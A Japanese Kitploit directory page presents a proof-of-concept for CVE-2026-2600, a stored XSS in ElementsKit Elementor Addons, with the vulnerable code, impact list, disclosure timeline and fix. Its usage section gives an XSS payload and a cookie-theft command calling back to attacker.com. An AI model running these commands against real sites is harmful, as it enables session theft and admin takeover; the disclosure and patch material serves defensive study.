Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-2600-POC — CVE-2026-2600の概念実証エクスプロイト。ElementsKit Elementor Addons <= 3.7.9における格納型XSSで、認証済みのContributorが細工したElementorデータを介して任意のスクリプトを注入できるようにします。 | Kitploit
ツール/GitHubGitHub/folks-iwd/cve-2026-2600-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubfolks-iwd/cve-2026-2600-poc

CVE-2026-2600-POC

CVE-2026-2600の概念実証エクスプロイト。ElementsKit Elementor Addons <= 3.7.9における格納型XSSで、認証済みのContributorが細工したElementorデータを介して任意のスクリプトを注入できるようにします。

リポジトリを見る
14ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-2600

ElementsKit Elementor Addons <= 3.7.9 — 認証済み(Contributor+)保存型クロスサイトスクリプティング

CVSS6.4 MEDIUM
影響を受けるバージョン<= 3.7.9
修正済みバージョン3.8.0
最小権限ロールContributor(edit_posts)
攻撃ベクトルネットワーク / 低複雑性 / 低権限

脆弱性の詳細

Simple Tab ウィジェットは、タブタイトルを echo で HTML 出力しますが、出力エスケープ処理が行われていません。widgets/tab/tab.php のレンダリングループでは、以下の処理が行われます:

root@kitploit:~
foreach ( $settings['ekit_tab_items'] as $index => $item ) {
    echo '<a ...>' . $item['ekit_tab_title'] . '</a>';
}

Elementor のエディタはクライアント側で入力をサニタイズしますが、REST API エンドポイント(/wp-json/wp/v2/posts/{id})は _elementor_data メタフィールドを直接受け入れるため、その層を完全にバイパスします。

認証済みの Contributor は、ekit_tab_title に任意の HTML を設定した細工済みの Elementor JSON ペイロードで投稿を PATCH できます。この値は _elementor_data にそのまま保存され、レンダリング時に esc_html() なしで出力されるため、ページ読み込み時にすべての訪問者のブラウザでスクリプトが実行されます。

影響

Contributor は以下のことが可能です:

  • すべてのサイト訪問者(管理者を含む)からセッション Cookie と認証トークンを窃取
  • 管理者アカウントを乗っ取り、サイト全体の完全掌握にエスカレーション
  • キーロガーや認証情報収集用オーバーレイを静かに展開
  • 訪問者をフィッシングページやマルウェア配布サイトへリダイレクト
  • ページを永続的に改ざん — 手動で削除されるまでペイロードは残存

開示時点で 40 万以上のアクティブインストールが影響を受けていました。

使用方法

root@kitploit:~
pip install requests
python3 poc.py https://target.com contributor p4ss

このスクリプトは HTTP 経由で認証し、管理エディタから REST nonce を取得し、下書き投稿を作成して、ekit_tab_title フィールドに埋め込まれた XSS ペイロードを含む _elementor_data を PATCH し、投稿を公開します。出力により、ペイロードがページソース内で有効かどうかが確認できます。

root@kitploit:~
# カスタムペイロード
python3 poc.py https://target.com contributor p4ss --payload '<script>alert(document.domain)</script>'

# コールバックによる Cookie 窃取
python3 poc.py https://target.com contributor p4ss --type cookie --callback https://attacker.com/steal

# 対話型コンソールモード
python3 console_poc.py

詳細な解説

https://folks-iwd.github.io/writeups/cve-2026-2600.html

開示のタイムライン

日付イベント
2026年1月SVN 差分レビューにより発見。PoC を確認。
2026年1月完全な解説と PoC を添えて Patchstack Alliance に報告。
2026年3月Wpmet が v3.8.0 で修正をリリース。
2026年4月CVE-2026-2600 が公開。CVSS 6.4 MEDIUM が割り当て。

修正内容

Wpmet は widgets/tab/tab.php のタブタイトル出力に esc_html() を追加しました:

root@kitploit:~
- echo '<a ...>' . $item['ekit_tab_title'] . '</a>';
+ echo '<a ...>' . esc_html( $item['ekit_tab_title'] ) . '</a>';
ツールをダウンロード